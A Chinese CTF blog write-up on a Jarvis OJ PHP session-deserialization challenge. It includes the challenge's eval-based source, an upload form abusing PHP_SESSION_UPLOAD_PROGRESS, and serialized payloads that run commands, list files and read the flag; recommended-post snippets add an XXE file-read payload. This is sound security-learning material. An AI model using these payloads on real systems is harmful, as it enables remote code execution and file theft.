jarvisoj-web的一道SESSION反序列化题目

最新推荐文章于 2024-05-17 09:17:42 发布
最新推荐文章于 2024-05-17 09:17:42 发布
阅读量503 收藏 2
点赞数 1
分类专栏: php序列化 文章标签: php PHP序列化 web ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/108006459
版权

哈哈哈,现学现卖。刚刚总结了session序列化漏洞。现在就来做一下这个题目
还是参考师傅博客。
题目地址

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

看代码前面是ini_set(‘session.serialize_handler’, ‘php’);
肯定要利用这个点。
而我们传递?phpinfo就会出现phpinfo页面
思路是:我们找一个可以利用php_serialize添加session的方法。在通过php的序列化进行解析从而形成漏洞。

这里参考Chybeta师傅的一个姿势:
session.upload_progress.enabled为On。session.upload_progress.enabled本身作用不大,是用来检测一个文件上传的进度。
但当一个文件上传时,同时POST一个与php.ini session.upload_progress.name同名的变量时(session.upload_progress.name的变量值默认为PHP_SESSION_UPLOAD_PROGRESS)
PHP检测到这种同名请求会在$_SESSION中添加一条数据。我们由此来设置session。

我们就构造上传页面进行上传

#upload.php
<!DOCTYPE html>
<html>
<body>
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>

#poc.php
<?php
class OowoO
{
    public $mdzz="system('ls');";
}
$obj = new OowoO();
echo serialize($obj);
?>
#O:5:"OowoO":1:{s:4:"mdzz";s:13:"system('ls');";}

payload:为防止转义,在引号前加上
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:13:\"system('ls');\";}

方法:将filename改成payload

失败!可能是禁止用了system函数,我们在phpinfo里面可以看到

使用:print_r(scandir(dirname(__FILE__)));
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}

之后通过phpinfo页面查看当前路径_SERVER["SCRIPT_FILENAME"]

最后使用print_r(file_get_contents());
payload
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

最后获得flag

总结:主要思想
session.upload_progress.enabled为On。session.upload_progress.enabled本身作用不大,是用来检测一个文件上传的进度。
但当一个文件上传时,同时POST一个与php.ini session.upload_progress.name同名的变量时(session.upload_progress.name的变量值默认为PHP_SESSION_UPLOAD_PROGRESS)
PHP检测到这种同名请求会在$_SESSION中添加一条数据。我们由此来设置session。

拓展:这个题的思想一点点像wmctf make php great again

参考
https://blog.csdn.net/nzjdsds/article/details/82703639?utm_source=app

Firebasky
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-7-21 Jarvis OJ-PHPINFO 知识点:session反序列化 PHP
m0_51326092的博客
07-21 379
文章目录前言题目和参考链接:重要知识点:解题过程总结 前言 本次做题历程可以说十分有趣,先是在BUU上自己做着easy_serialize_php,看完源代码以为是跟session有关的反序列化(后面自己查了wp发现不是×-×),所以自己就去百度关于session反序列化的知识点,看着看着就去做到了这到例题☺可谓是一波三折啊 提示:以下是本篇文章正文内容,本文借鉴了多位大佬的wp,仅供参考 题目和参考链接: 题目:http://web.jarvisoj.com:32784/ 相关知识点大佬讲解链接:
jarvis oj 神盾局的秘密 wp
欢迎来到神林的博客
09-12 384
jarvis oj 中的反序列化 收集信息: 发现是张图片,如果没有表明是个misc题目的话,这张图片显然是base64文件流读出来的,新标签看一下:         显然,这是个bsae64文件读出来的,上面 "img ="给我我们提示,显然是个任意文件读,那么我们把它所有必要文件都读出来: index.php shield.php ...
[CTF][高校战疫]php-session反序列化题目
Y4tacker的博客
09-29 6194
文章目录前置知识session 的存储机制利用session.upload_progress进行文件包含和反序列化渗透wp 前置知识 session 的存储机制 php中的session中的内容并不是放在内存中的,而是以文件的方式来存储的,存储方式就是由配置项session.save_handler来进行确定的,默认是以文件的方式存储。 存储的文件是以sess_sessionid来进行命名的 php : 默认使用方式,格式 键名|键值(经过序列化函数处理的值) php_serialize: 格式 经过序列
一道反序列化session
qq_53063436的博客
10-30 119
index.php: <?php ini_set('session.serialize_handler', 'php'); require("./class.php"); session_start(); $obj = new foo1(); $obj->varr = "phpinfo.php"; ?> 这是foo1的析构函数 class.php <?php highlight_string(file_get_contents(basename($_SERVER[
JavaWebSession序列化反序列化 && Session的活化和钝化
it_manman的博客
04-03 272
应用场景:1.一般来说,服务器启动后,就不会再关闭了,但是如果逼不得已需要重启,而用户会话还在进行相应的操作,这时就需要使用序列化session信息保存起来放在硬盘,服务器重启后,又重新加载。这样就保证了用户信息不会丢失,实现永久化保存2.淘宝每年都会有定时抢购的活动,很多用户会提前登录等待,长时间不进行操作,一致保存在内存中,而到达指定时刻,几十万用户并发访问,就可能会有几十万个session...
深入解析PHPSESSION反序列化机制
10-20
总结来说,了解和控制PHPSESSION反序列化机制是构建安全和稳定Web应用程序的重要部分。开发者应该熟悉PHP的配置选项和会话处理机制,以及如何保护应用程序免受潜在的序列化攻击。在处理用户输入或来自不可信来源的...
[Timeline Sec] - CVE-2020-9484:Tomcat Session 反序列化复现1
08-03
CVE-2020-9484的根源在于错误配置和`org.apache.catalina.session.FileStore`组件中的本地文件包含(LFI)以及反序列化问题。当Tomcat配置使用`org.apache.catalina.session.PersistentManager`作为会话管理器,并且...
S23-MySQL-JDBC反序列化1
08-03
MySQL-JDBC反序列化漏洞是一种安全风险,出现在MySQL的Java驱动程序中,允许攻击者通过特定的JDBC连接参数触发反序列化过程,可能导致远程代码执行。这种漏洞主要利用了MySQL Connector/J,它是MySQL数据库与Java...
jarvisoj web-多题wp
weixin_46578840的博客
09-20 3072
api调用,XXE漏洞,上payload <?xml version="1.0"?> <!DOCTYPE asdf[ <!ENTITY xxe SYSTEM "file:///home/ctf/flag.txt">]> <something>&xxe;</something> 图片上传漏洞 打开题目地址发现只能上传图片,而且绕不过,只能扫一波目录,发现了test.php,是phpinfo 看到imagick打开了 想到 CVE-201
PHP基于session.upload_progress 实现文件上传进度显示功能详解
10-16
主要介绍了PHP基于session.upload_progress 实现文件上传进度显示功能,结合实例形式分析了php5.4版本session.upload_progress特性实现文件上传进度显示的相关操作技巧,需要的朋友可以参考下
session反序列化漏洞2——ctfshow web263
m0_73756016的博客
03-31 669
die("登陆失败次数超过限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);会解析session文件里面的内容(用php处理器)(把它反序列化)然后这里就会触发_destruct()析构函数。通过inc.php反序列化触发析构函数 用file_put_contents()写入一句话木马getshell。看别人的wp分析 猜测这里phpini的默认处理器应该不为php 才在这里声明的。这里的$_SESSION['limit']是可控变量。
jarvisoj-web-wp
Iambangbang的博客
08-21 3558
Port51 这是一道pctf的原题,,显然要用公网ip端口进行访问,这时候用到了curl命令,使用curl –local-port http://web.jarvisoj.com:32770/就可以得到flag,但是貌似服务器出了点儿问题,所以不弹flag了 LOCALHOST ,这个题目和上面一道题目差不多,都很基础,用火狐的代理,直接就可以了, Login ,一开始进去没什么思
session反序列化
csjjjd的博客
01-25 1314
到这里,我们得先明白我们要做什么,我们传参a是以php_serialize格式写进去的,但是读取是php读取的,a=|O:1:"D":1:{s:1:"a";经过php_serialize保存后,变成了:a:1:{s:3:"ben";键名的长度对应的ASCII字符+键名+经过serialize()函数反序列化处理的值。还是老样子,反序列化的很多漏洞开头都是一样的,都要先进行一次正常的反序列化。键名的长度对应的ASCII字符+键名+经过。希望大家能够从文章中收获知识!
PHP session反序列化漏洞
weixin_39664643的博客
03-14 5488
PHP session反序列化漏洞 PHP session反序列化漏洞,就是当【序列化存储Session数据】与【反序列化读取Session数据】的方式不同导致session反序列化漏洞的产生 什么是session 官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点: session保存的位置是在服务器端 session通常是要配合cookie使用 因为HTTP的无状态性,服务端产生了session来标识当前
四个实例递进php反序列化漏洞理解
大方子
09-14 8161
索引 最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php反序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行! D0g3 为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化反序列化。顺便安利一下D0g3小组的平台...
CTF-web Xman-2018 第四天 WEB习题1
iamsongyu的博客
12-11 1662
例题 localhoost访问 更改x-forwarded-for=127.0.0.1   api调用  http://web.jarvisoj.com:9882/ 目录扫一下没什么特别的东西,看一下源码发现了关键代码 &lt;script&gt; function XHR() { var xhr; try {xhr = new XMLHttpReque...
php反序列化代码,代码审计|PHP反序列化入门之session反序列化
weixin_29830873的博客
03-12 172
原标题:代码审计|PHP反序列化入门之session反序列化PHPsession机制在学习 session反序列化之前,我们需要了解这几个参数的含义。Directive含义session.save_handlersession保存形式。默认为filessession.save_pathsession保存路径。session.serialize_handlersession序列化存储所用处理器。默...
深入浅出带你学习利用session.upload_progress进行文件包含/深入浅出带你学习利用session.upload_progress进行文件包含_新手渗透自学
最新发布
程序员六七的博客
05-17 324
本文正在参加「金石计划 . 瓜分6万现金大奖」前言该思路是很久之前在CTF比赛中学习到的,可以简单理解为利用.来进行文件竞争从而达到上传文件进行文件包含或者命令执行的目的
spring-session-redis 面对redis配置序列化无效
03-31
如果您在使用 Spring Session Redis 时遇到了配置序列化无效的问题,可能是因为 RedisTemplate 中使用的序列化器与 Spring Session Redis 中使用的不同。为了解决这个问题,您可以尝试以下步骤: 1. 确认 RedisTemplate 中使用的序列化器是否与 Spring Session Redis 中使用的一致。您可以在 RedisTemplate 中设置序列化器的方式如下: ```java RedisTemplate redisTemplate = new RedisTemplate(); redisTemplate.setConnectionFactory(connectionFactory); redisTemplate.setDefaultSerializer(new GenericJackson2JsonRedisSerializer()); redisTemplate.setKeySerializer(new StringRedisSerializer()); redisTemplate.setValueSerializer(new GenericJackson2JsonRedisSerializer()); redisTemplate.setHashKeySerializer(new StringRedisSerializer()); redisTemplate.setHashValueSerializer(new GenericJackson2JsonRedisSerializer()); redisTemplate.afterPropertiesSet(); ``` 2. 如果 RedisTemplate 中使用的序列化器与 Spring Session Redis 中使用的不同,可以尝试在 Spring Session Redis 的配置中指定使用的序列化器: ```yaml spring: session: store-type: redis redis: namespace: myapp flush-mode: on_save cleanup-cron: '0 * * * * *' serializer: jackson ``` 3. 如果仍然无法解决问题,您可以尝试自定义 RedisTemplate,并将其注入到 Spring Session Redis 中: ```java @Configuration public class RedisConfig { @Bean public RedisTemplate<String, Object> redisTemplate(RedisConnectionFactory redisConnectionFactory) { RedisTemplate<String, Object> redisTemplate = new RedisTemplate<>(); redisTemplate.setConnectionFactory(redisConnectionFactory); redisTemplate.setDefaultSerializer(new GenericJackson2JsonRedisSerializer()); redisTemplate.setKeySerializer(new StringRedisSerializer()); redisTemplate.setValueSerializer(new GenericJackson2JsonRedisSerializer()); redisTemplate.setHashKeySerializer(new StringRedisSerializer()); redisTemplate.setHashValueSerializer(new GenericJackson2JsonRedisSerializer()); redisTemplate.afterPropertiesSet(); return redisTemplate; } @Bean public RedisOperationsSessionRepository sessionRepository(RedisTemplate<String, Object> redisTemplate) { return new RedisOperationsSessionRepository(redisTemplate); } } ``` 希望这些步骤可以帮助您解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值